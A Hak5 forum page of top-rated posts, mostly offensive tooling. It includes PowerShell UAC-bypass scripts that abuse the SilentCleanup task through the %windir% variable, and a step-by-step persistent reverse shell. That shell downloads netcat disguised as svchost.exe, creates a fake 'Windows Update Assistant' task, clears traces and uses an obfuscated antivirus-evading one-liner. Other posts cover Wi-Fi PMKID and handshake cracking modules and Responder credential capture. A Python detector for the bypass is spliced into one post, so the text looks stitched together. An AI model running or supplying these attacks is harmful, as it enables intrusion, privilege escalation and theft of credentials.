Leaderboard


Popular Content

Showing content with the highest reputation since 02/26/2019 in all areas

  1. 3 points
    Here you go, new version. @Darren Kitchen @lokiuox https://github.com/PoSHMagiC0de/Invoke-TaskCleanerBypass It uses dynamic parameters and can take in the standard posh base64 encoded commands or a file location of your script. As far as the bypass thing. Just run it as an encoded command. Better yet, here is a good way to launch it. 😛 Just create an encoded stager to downloadstring the bypass script from web server and execute with "Invoke-Expression" IEX for short with the command. You probably can take this function, add after it the command to run it with your parameters and encode the whole thing to run. No bypass to execution policy needed. Anyway, look at the script. Some modifications were needed to the reg hack. I needed to use cmd /c in front so I could escape the appended stuff that gets added when run like the cleaner command. That was breaking the exploit. So the new reg entry is cmd /c yourpayload & :: That runs the command and then rems out whatever else is there. SQL injection for registries. 😛 Since I won the competition this month, I am not payloading this. Someone else can run with this and create a BB payload. I know a few ways to use it but someone else can have a turn. FYI: It checks if you have Win10, member of local admins and already UAC bypassed. Will run if bypassed, will do nothing if not on 10 or greater and/or not a local admin.
  2. 2 points
    Hi all - We're excited to introduce a new bit of kit to the Hak5 arsenal – the Plunder Bug! It's a smart LAN Tap with a new take on Packet Sniffing! This is a bit of kit I've been wanting for myself for quite a long time, as I've never been satisfied with the traditional RJ45 Ethernet-based LAN Taps, and if we were going to make one we'd make it special with the ability to act as not just a tap but a mini-switch and a USB Ethernet adapter all in one. It's sweet and simple with the convenience of USB-C and a very small form-factor while sporting some features you won't find in your typical LAN Taps – like the integrated USB Ethernet adapter (yay, no more mess of cables and dongles!), the ability to make passive captures or active scans (acting sort of like an unmanaged switch), and a companion Android root app that makes it possible to capture packets right from your phone! You can find the device for sale now at https://shop.hak5.org/products/bug The documentation can be found at https://docs.hak5.org/hc/en-us/categories/360001482953-Plunder-Bug And the connection scripts are available in the Hak5 Download Center at https://downloads.hak5.org/ and on our Github at https://github.com/hak5/plunderbug-scripts As for the tech, we've packed in a 10/100 Base-T Fast Ethernet switch with the mirrored traffic heading to the integrated USB Ethernet adapter (ASIX AX88772C chipset) and the whole thing is powered over USB-C with a very low draw around 200-300 mA. INB4 it's compatible with gigabit links in that it'll drop 'em to 100 Mbit. I'll post a video here shortly – stay tuned! Huge props to the ever growing Hak5 dev team and their awesome work putting together these scripts and the killer Android app (more on that soon) and as always thanks again to you guys for being the awesome Hak5 community that you are, for your feedback and contributions and making this place somewhere all hackers belong 🙂
  3. 2 points
    function sudo {
        $command = "powershell -noexit " + $args + ";#"
        Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir"
    }
    Quick function that works like sudo 🙂
  4. 2 points
    Hi everyone! First of all, sorry if my English is not that good, it's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is:
    if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #Payload goes here
        #It'll run as Administrator
    } else {
        $registryPath = "HKCU:\Environment"
        $Name = "windir"
        $Value = "powershell -ep bypass -w h $PSCommandPath;#"
        Set-ItemProperty -Path $registryPath -Name $name -Value $Value
        #Depending on the performance of the machine, some sleep time may be required before or after schtasks
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
        Remove-ItemProperty -Path $registryPath -Name $name
    }
    Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that needs admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself.
    The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable
  5. 2 points
    ## Use powershell -ep bypass .\script.ps1 to launch ##
    ## Fixed an issue with spaces in the script path. ##
    ## Added option for interactive window, comment out the code to change back to hidden ##
    ## Current example below opens an Admin powershell window ##
    if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #Payload goes here
        #It'll run as Administrator
        powershell.exe
    } else {
        $registryPath = "HKCU:\Environment"
        $Name = "windir"
        #Use for hidden window
        #$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
        #Use for interactive window
        $Value = "powershell -ExecutionPolicy bypass -Command `"& `'$PSCommandPath`'`";#"
        Set-ItemProperty -Path $registryPath -Name $name -Value $Value
        #Depending on the performance of the machine, some sleep time may be required before or after schtasks
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
        Remove-ItemProperty -Path $registryPath -Name $name
    }
    Fixed an issue with spaces in the script path.
  6. 2 points
  7. 2 points
    https://www.mercari.com/us/item/m46935763151/?gclsrc=aw.ds&&utm_source=google&utm_medium=cpc&utm_campaign=1709941428&utm_content=t0&adgroup=70707275910&network=g&device=m&merchant_id=130862017&product_id=m46935763151&product_id=301541986033&gclid=Cj0KCQiAn4PkBRCDARIsAGHmH3dO2yZdFtPlK97vqqjcaW37yIBKogxdThVUDb44bHGpQepxon3g9GsaAk22EALw_wcB
  8. 2 points
    Make sure you're giving it enough time to flash the firmware. How long have you waited? Make sure you're specifying the IP and Port, at http://172.16.42.1:1471.
  9. 1 point
    HELLO Hak5 COMMUNITY! This is my first thread. I have written a program that exfiltrates files over audio waves.
    Technical information:
    =======================
    Protocol : AFSK1200 x25 packet radio Fire-And-Forget mod
    Baud rate: 1200bps stable (0.15 KBytes/second, 10 kilobytes/minute)
    Language : C# .NET 3.5
    =======================
    I have written this for the [Payload] segment of Hak5. As I am too poor to buy a rubber ducky [not kidding], it would be cool if someone would make a rubber ducky payload out of this. I am dreaming of a rubber ducky... This program takes as input a file, [binary data of any kind] and converts it to a .wav file, that would be then played, and the audio output would be recorded with a smartphone. Then, it takes a .wav input and converts it to a file [only supports utf8 ATM, if you plan on decoding other binary data, use minimodem or one of the tens of other FSK decoders out there]. THIS IS JUST A PoC script! It proves that the concept of stealing files over audio is possible! Source Code Download for pre-build binary [merged and not obfuscated] : HERE Obfuscated assembly : HERE Hope you like it!
  10. 1 point
    Link to my original reddit post
    So how do we create such a reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escalating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell:
    cd $env:public
    $url1="YOUR_NC64_LINK"
    $url2="YOUR_XML_LINK"
    $path1="$env:public\svchost.exe"
    $path2="$env:public\x.xml"
    (new-object net.webclient).downloadfile($url1,$path1)
    (new-object net.webclient).downloadfile($url2,$path2)
    cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml'
    So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create a scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one line of code? Very simple, by invoking expression called DownloadString in powershell like this:
    powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')"
    But the problem with this one-liner is that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit:
    cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))"
    And there it is, this one-liner will get you a persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
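The posts above (the sudo function, the respawning script, its space-safe variant and this one-liner) all share two observable actions a defender can key on: a write to HKCU\Environment\windir (Windows takes the real %windir% from the machine-wide environment, so a per-user value has no legitimate reason to exist) and a manual run of the SilentCleanup task, after which a process other than cleanmgr.exe starts carrying the task action's "\system32\cleanmgr.exe" tail on its command line. Because every variant deletes the registry value again right after the task fires, the registry write event is the durable signal. The following Python detector is an added example, not code from any of the posts or from the Invoke-TaskCleanerBypass project; it runs those checks over constructed Sysmon-style records (key names mimic Sysmon's RegistryEvent SetValue / ProcessCreate fields, which is an assumption about the reader's logs; SIDs, paths and user names are made up).

```python
"""Detector for the SilentCleanup / %windir% hijack described in the posts above.

Added example, not code from the forum posts. Input records are constructed dicts
whose keys mimic Sysmon field names (EventID 13 = RegistryEvent SetValue,
EventID 1 = ProcessCreate); that schema is an assumption about the reader's logs.
"""
import re
from typing import Dict, Iterable, List

# Windows takes %windir% from the machine-wide environment block, so a per-user
# "windir" value under HKCU\Environment (logged by Sysmon as HKU\<SID>\Environment)
# is suspicious by itself, whatever it contains.
USER_WINDIR_RE = re.compile(r"\\Environment\\windir$", re.IGNORECASE)

# The same write issued from a command line: reg.exe (as in the one-liner above)
# or a literal Set-ItemProperty. Script files that build the value from variables
# are not visible here; the registry event above covers those.
CMDLINE_WRITE_RE = re.compile(
    r'(?:reg(?:\.exe)?\s+add\s+"?HKCU\\Environment"?\s+/v\s+"?windir"?'
    r'|Set-ItemProperty\b[^\n]*HKCU:\\Environment[^\n]*-Name\s+"?windir"?)',
    re.IGNORECASE,
)

# A user triggering the auto-elevating task by hand.
SILENTCLEANUP_RUN_RE = re.compile(r"schtasks(?:\.exe)?\s+/run\b[^\n]*SilentCleanup", re.IGNORECASE)

INTERPRETERS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript")


def _finding(ev: Dict, severity: str, reason: str) -> Dict:
    return {"severity": severity, "event_id": ev.get("EventID"),
            "user": ev.get("User", "?"), "reason": reason}


def analyse(events: Iterable[Dict]) -> List[Dict]:
    """Return one finding per suspicious event, in input order."""
    findings: List[Dict] = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 13 and USER_WINDIR_RE.search(ev.get("TargetObject", "")):
            details = ev.get("Details", "")
            # A value that launches an interpreter is the hijack itself.
            sev = "high" if any(i in details.lower() for i in INTERPRETERS) else "medium"
            findings.append(_finding(ev, sev, "per-user windir set to: " + details))
        elif eid == 1:
            cmd = ev.get("CommandLine", "")
            image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
            if CMDLINE_WRITE_RE.search(cmd):
                findings.append(_finding(ev, "high", "command line writes HKCU\\Environment\\windir"))
            elif SILENTCLEANUP_RUN_RE.search(cmd):
                findings.append(_finding(ev, "medium", "manual run of the SilentCleanup task"))
            elif "cleanmgr.exe" in cmd.lower() and image != "cleanmgr.exe":
                # The task action is "%windir%\system32\cleanmgr.exe ..."; with a
                # hijacked %windir% the expanded command line still ends with that
                # tail, but the process that starts is the attacker's interpreter.
                findings.append(_finding(ev, "high", f"SilentCleanup action expanded into {image}"))
    return findings


# Constructed sample telemetry (SIDs, paths and user names are made up).
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "User": "LAB\\alice", "Image": r"C:\Windows\system32\cleanmgr.exe",
     "CommandLine": r"C:\Windows\system32\cleanmgr.exe /autoclean /d C:"},             # benign
    {"EventID": 13, "User": "LAB\\alice",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\windir",
     "Details": r"powershell -ep bypass -w h C:\Users\alice\script.ps1;#"},             # the hijack
    {"EventID": 1, "User": "LAB\\alice", "Image": r"C:\Windows\system32\reg.exe",
     "CommandLine": r'reg add "HKCU\Environment" /v "windir" /d "CONSTRUCTED_VALUE"'},  # reg.exe variant
    {"EventID": 1, "User": "LAB\\alice", "Image": r"C:\Windows\system32\schtasks.exe",
     "CommandLine": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"EventID": 1, "User": "LAB\\alice", "IntegrityLevel": "High",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ep bypass -w h C:\Users\alice\script.ps1;#\system32\cleanmgr.exe /autoclean /d C:"},
    {"EventID": 13, "User": "LAB\\alice",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\Path",
     "Details": r"C:\Users\alice\bin"},                                                 # benign
]


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f['severity']:6}] event {f['event_id']} user {f['user']}: {f['reason']}")
```

Run it and the benign cleanmgr start and the unrelated Path change produce nothing, while the four steps of the technique each produce a finding; feeding real Sysmon output means mapping your collector's field names onto the keys used here.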
  11. 1 point
    I see the NANO and TETRA have been on sale, and the NANO is now all sold out. Could it be there is a new Pineapple generation on the horizon? Would anyone form hak5 care to comment?
  12. 1 point
    I ran into the same problem with my turtle. Following all of the reset steps nothing seemed to work. After contacting support I was told it was out of warranty and that they wouldn't be able to swap it out. No big deal. That just meant I could pull out the soldering iron and not risk breaking something that wasn't already a brick.
    Step 1: Remove the casing from the Lan Turtle (you should have already done this if you followed the factory reset steps and it failed)
    Step 2: Turn the Lan Turtle so that the ethernet connector is on top and on the left side of the board.
    Step 3: Locate the two empty solder pads just above the AR9331 chip (if your turtle is like mine). These two pads are the UART TX and RX pads for hooking up a serial connector.
    Step 4: Carefully solder two wires onto the UART pads and one ground wire to either the shielding connector on the USB or Ethernet connectors.
    Step 5: Hook the wire on the left to the RX on your serial adapter and the right cable to TX on your serial adapter. Hook the ground to the ground connector.
    Step 6: Plug the Lan Turtle in, and open a serial terminal at 115200, 8, N, 1 then hit enter to get the lan turtle menu.
    Step 7: Disable and remove all modules then reset your password. Unplug your Turtle and plug it back in. You should be able to then SSH to the device and perform a manual update.
  13. 1 point
    Could even go so far as to fax that letter ...
  14. 1 point
    Name: PMKIDAttack
    Author: n3d.b0y
    Platform: Tetra / NANO
    Version: 1.2
    GitHub: https://github.com/n3d-b0y/PMKIDAttack
    Description: This module makes it easy to capture PMKID. We scan the network, click the attack button opposite the attacked access point and wait for the result. After we receive PMKID, the attack will automatically stop and the file with hashes will go to the Captured block where you can download it.
    Module installation for Tetra:
    opkg update && opkg install git git-http
    cd /pineapple/modules/
    git clone https://github.com/n3d-b0y/PMKIDAttack.git PMKIDAttack
    chmod +x -R /pineapple/modules/PMKIDAttack/scripts
    Module installation for NANO:
    opkg update && opkg --dest sd install git git-http
    cd /sd/modules/
    git clone https://github.com/n3d-b0y/PMKIDAttack.git PMKIDAttack
    chmod +x -R /sd/modules/PMKIDAttack/scripts
    You can also contact me in this thread: https://codeby.net/threads/6-wifi-pineapple-pmkidattack.66709/
  15. 1 point
    Just a thought about running on systems that block .ps1 files. In some cases you can open the powershell_ise.exe paste the script and hit F5 to run.
  16. 1 point
    I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran it I realized: SilentCleanup task runs as "Users" and not administrator. I realized the script goes into a loop, because the user is never a member of group "S-1-5-32-544" so it recursively calls itself. I changed the value of windir to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" so I could pause and see what was going on. It said: That seems to have correctly run what I wanted, mkdir and a pause, the rest was ignored, but still it seems it doesn't have permissions. Am I missing something here?
  17. 1 point
    You shouldn’t worry yourself with that. It’s not polite, right or legal. Instead send a sincere, nice hand written letter letting them know your feeling.
  18. 1 point
    I have heard that using a hammer will stop blinking thingies
  19. 1 point
    https://youtu.be/qwZsCRcUsFA
  20. 1 point
    You can also join the discord server or IRC and ask/chat there, don't always expect immediate responses but the good folks there will point you in right direction.
  21. 1 point
    Have you read the one at docs.hak5.org yet? The one at wiki.wifipineapple.com is a little bit old.
  22. 1 point
    They are supposed to be unique so you don't get replacements, you just get new tags, disable the old ones and enable the new ones.
  23. 1 point
    This is not just an old people thing. A lot of ISPs (at least here in Australia anyway) use phone numbers as default wifi passes for the 3G and 4G modems (and many others). And yes I agree, this is a great way to start your brute forcing. You don't need to pipe this through crunch though. You can use hashcat's mask generator 😉
    hash64.bin -a 3 -m 2500 TelstraA84A9F.hccapx 253?d?d?d?d?d?d?d
    (this will generate 7 random numbers following "253" which presumably you know). A lot of the netgear modem/routers use a combination of adjective+noun+XXX (where xxx is 3 random digits) e.g. "luckybanana437". I had a list specific to netgear's factory passes somewhere so let me know if you want me to find it and I will upload it somewhere. Netgear Arlo base stations used this for their camera systems as well 😄 10 random hex chars is another favourite default pass but that can become unmanageable unless you have multiple GPUs or some really neat rules to minimise the cracking time. I guess it's worth mentioning that rockyou.txt gets a few hits every once in a while as well. Most people never change their default passes so bottom line: doing a bit of research at the start will save you a LOT of brute forcing time down the track 😉
  24. 1 point
    Name: HandshakeCrack
    Author: n3d.b0y
    Platform: Tetra / NANO
    Version: 1.1
    GitHub: https://github.com/n3d-b0y/HandshakeCrack
    Description: The module allows you to send the intercepted handshake to the online service of decrypting hashes www.onlinehashcrack.com. Also there is a functional for cavitation handshake.
    Module installation for Tetra:
    opkg update && opkg install git git-http
    cd /pineapple/modules/
    git clone https://github.com/n3d-b0y/HandshakeCrack.git HandshakeCrack
    chmod +x -R /pineapple/modules/HandshakeCrack/scripts
    Module installation for NANO:
    opkg update && opkg --dest sd install git git-http
    cd /sd/modules/
    git clone https://github.com/n3d-b0y/HandshakeCrack.git HandshakeCrack
    chmod +x -R /sd/modules/HandshakeCrack/scripts
    You can also contact me in this thread: https://codeby.net/threads/5-wifi-pineapple-handshakecrack.66700/
  25. 1 point
    Update v1.1 Added support for NANO https://github.com/n3d-b0y/HandshakeCrack/releases/tag/v1.1
  26. 1 point
    Update v1.2 Added support for NANO https://github.com/n3d-b0y/PMKIDAttack/releases/tag/v1.2
  27. 1 point
    https://sano.shop/en/products/detail/109345?gclid=Cj0KCQiAn4PkBRCDARIsAGHmH3c1tWHbd59LXI8nZyd0MlVmgHTFYIW2cvPuz_hOi838voyDbbYCkFsaAhaIEALw_wcB one more guess
  28. 1 point
    Hey all, When installing stuff to the sd card, it often needs symlinking to the working directory on the pineapple nano to complete the installation. For one-offs it's fine to do manually, but on larger git installs or opkg packages with many folders/files it can be a PITA. So I got to looking around for tools/scripts, I found a few (some better than others) but think I found something that works, and works well on the pineapple YMMV. It has one small sized dependency so can be installed to pineapple nano rather than sd:
    opkg update && opkg install coreutils-realpath
    You can run it multiple times and it will only create links for unlinked files so could be run on the base directory after adding new files like:
    aln -s /sd/usr/ -d /usr/
    I have been using it for a few days and so far so good, so figured I would share for others to try out. https://github.com/eyit/aln Hopefully it's useful to others.
  29. 1 point
    So I managed to get the PMKIDAttack module to run on the pineapple nano and even made a repo for those with the nano, I'm waiting for n3d.b0y to give me permission to make the repo public
  30. 1 point
    not entirely true, it's there, just not activated. Where you would require admin rights to install is:
    dism /online /Enable-Feature /FeatureName:TelnetClient
    and / or
    pkgmgr /iu:"TelnetClient"
    Or powershell.
    Install-WindowsFeature "telnet-client"
    ---
    Which I think is a bloody shame since telnet is like a universal Swiss army tool if you want to analyse networking problems and ports. (e.g. telnet to a host on port 80/443 to see if the connection is up or not firewalled) However, the site indicated is locked from a lot of locations as port 23 is not open on most firewalls as telnet is unencrypted traffic; hence blocked
  31. 1 point
    after reboot, I got it to show XD, I'll test for functionality
  32. 1 point
    with mdk3 I'll run some tests maybe tonight to see what router models can be forced to reboot and unlock the wps pin module to allow for further progress of pin attempts... I'm excited to post some example code and explanation of my techniques.
  33. 1 point
    You don't install Tor, it is a service you talk to as a proxy, any application that understands HTTP proxies can use it. If you've got deep packet inspection then I'd keep monitoring it and note what you are doing when it is detected, see if you can spot what apps are running. I'd also run malware detection as malware often uses Tor to hide its C&C channel endpoint.
  34. 1 point
    For my 4 options I have me@mybox.com I have my ssh port I use on mybox.com. 22 I have the port on that box I will see open and use to connect back on 2222 for the last option its the port on my turtle that ssh runs on. 22 I found I had to run it first from the command prompt and approve the server before it would work. Also I put in a crontab to restart every day otherwise I seem to not have a connection when I look for it a month later. YMMV
  35. 1 point
    I gave it like 10 minutes but no luck. So I've tried it a few more times and I finally got it to work. I only had the issue that my sd card wasn't found but after a few reboots that issue also went away! It's back up and running now! Thanks all for the help!
  36. 1 point
    I've solved this issue. Seems that wp6.sh is stuck in "until ping $spineappleip -c1 -w1 >/dev/null" and isn't able to configure iptables in order to forward traffic from WIFI Pineapple to Ubuntu through shared internet (eth or wireless). https://github.com/hak5darren/wp6/blob/master/wp6.sh
    ...
    function connectsaved {
      if [[ "$sfirsttime" == "1" ]]; then
        printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
      fi
      ifconfig $spineapplelan $spineapplehostip netmask $spineapplenmask up #Bring up Ethernet Interface directly connected to Pineapple
      printf "Detecting WiFi Pineapple..."
      until ping $spineappleip -c1 -w1 >/dev/null
      do
        printf "."
        ifconfig $spineapplelan $spineapplehostip netmask $spineapplenmask up &>/dev/null
        sleep 1
      done
      printf "...found.\n\n"
      printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)\||/$(tput sgr0)\n"
      printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3),<><>,$(tput sgr0)\n"
      printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)'<><>'$(tput sgr0)\n"
      ifconfig $spineapplelan $spineapplehostip netmask $spineapplenmask up #Bring up Ethernet Interface directly connected to Pineapple
      echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
      iptables -X #clear chains and rules
      iptables -F
      iptables -A FORWARD -i $spineapplewan -o $spineapplelan -s $spineapplenet -m state --state NEW -j ACCEPT #setup IP forwarding
      iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
      iptables -A POSTROUTING -t nat -j MASQUERADE
      route del default #remove default route
      route add default gw $spineapplegw $spineapplewan #add default gateway
      printf "\n Browse to http://$spineappleip:1471\n\n"
      exit
    }
    ...
    I had to set IP/Mask manually on Ubuntu (172.16.42.42, 255.255.255.0) to the network interface (WIFI Pineapple USB connected to Ubuntu's USB port), once completed, I executed the wp6.sh > [A]dvanced IP settings and finally [C]onnect using saved settings. I hope it helps. Regards.
  37. 1 point
    Are you meaning this one? In the Networking tab.
  38. 1 point
  39. 1 point
    I don't know why but this made me lol pretty hard. Blunder Bug does have a certain ring to it... 😂
  40. 1 point
    Maybe?
    ping -c 1 website.com
    If you want all the open ports
    nmap -p- website.com
    (will only do TCP ports I think, -sU does the UDP) Do keep in mind that many websites may 'share' the same IP address on shared hosting.
  41. 1 point
    Awesome, thank you for posting an update. I'll make sure that it's impossible to enter a passphrase via the UI that's too long in the next firmware version.
  42. 1 point
    Just wanna give people a heads up that these tools get updated almost daily, as I'm trying my best to keep up with the changes from ZerBea. So please, always make sure you're running the latest release. 🙂
  43. 1 point
    Hak5 did it with a yagi a while back 🙂 https://www.hak5.org/episodes/hak5-1515
  44. 1 point
    you can use SCP over SSH or if you prefer a GUI you can use filezilla.
  45. 1 point
    After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues. Here's our fix! (we take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!)
    Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV.
    Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine
    ssh in to 172.16.84.1, sh3llz, change password
    Update the modules list
    Only install QuickCreds for now, so we have enough space
    Select QuickCreds and configure
    Let it install its dependencies
    You can now set QuickCreds to 'Enable' so that it will start at boot
    DO NOT REBOOT YET! At this point, we're going to exit and git clone the responder package
    DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF
    Exit 'turtle' back to a basic root shell
    Git clone the Responder package first to /tmp since there is plenty of space.
    git clone git://github.com/lgandx/Responder /tmp/Responder
    BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp
    du -sh /tmp/Responder
    3.8M
    rm -rf /tmp/Responder/.git
    rm -rf /tmp/Responder/tools/MultiRelay/
    du -sh /tmp/Responder
    450.5k
    We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package 😕
    opkg remove git
    df -h
    1.2M available on /
    Move the Responder package back to /etc/turtle/ for QuickCreds to find it
    mv /tmp/Responder/ /etc/turtle/
    df -h
    1.1M still available on / now (w00t)
    The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another 😕
    sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds
    You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds
    Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!!
    Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt
    Paste into a hash file and send it to john with a wordlist
    john hash.txt --wordlist=wordlist.txt
    Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  46. 1 point
    Maybe take a look at https://github.com/WiPi-Hunter
  47. 1 point
    After sharing an internet connection with the bash bunny, and then ssh-ing in, the following seemed to work for me when updating the bunny:
    apt-get update
    apt-mark hold procps
    apt-get upgrade
    When apt-get then listed out what it was going to upgrade, it showed procps as not being upgraded.
  48. 1 point
    Hello! I'm very new to pentesting and I'm looking for someone who could help mentor me a little. My TETRA arrived today and I will have a lot of questions on how to get started. I have watched all the videos on how to connect it to my phone and PC (and the primer)... Anyway, if any of you want a pet project, I'm willing to learn.
  49. 1 point
    Introduction: This process requires an Android phone capable of running the EasyTether app which can be downloaded here: http://www.mobile-stream.com/a/easytether-device.apk and also possibly an SD card. The Lite version of the app prevents https & udp connection, so to use those you have to pay mobile stream $10 once, which I still think is better than paying your carrier that every month. I do not endorse tethering data without your carrier's permission, proceed at your own risk. I am currently working on a module that will automate this process, if you can't figure out this tutorial you can wait for that or contact me.
    Setup on Android: Download and install the EasyTether app and follow the in-app instructions for setting up USB Tethering.
    Setup on the Pineapple: You will need to install EasyTether for Openwrt located here: http://www.mobile-stream.com/easytether/drivers.html I used the OpenWrt 15.05 --openssl which I show being downloaded below. NOTE: You may need an SD card for this as it is a larger file. The below commands assume you have an SD card set up correctly. If you do not wish to install to your SD card ignore the --dest sd options below and know that it may not work.
    root@Pineapple:/sd# wget http://www.mobile-stream.com/beta/openwrt/easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip
    Once you have downloaded the package, install unzip so you can open the previously downloaded compressed package. (BTW if anybody knows what the two errors at the bottom are let me know, to my knowledge they do not affect the packages being installed. My assumption is that opkg is searching in /usr when it should be looking in /sd/usr).
    root@Pineapple:/sd# opkg install unzip --dest sd
    Installing unzip (6.0-3) to sd...
    Downloading https://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/packages/unzip_6.0-3_ar71xx.ipk.
    Configuring unzip.
    grep: /usr/lib/opkg/info/unzip.control: No such file or directory
    cat: can't open '/usr/lib/opkg/info/unzip.list': No such file or directory
    Then unzip the EasyTether application.
    root@Pineapple:/sd# unzip easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip
    Then cd to the correct application distribution.
    root@Pineapple:/sd# cd 15.05-rc3/ar71xx/generic/
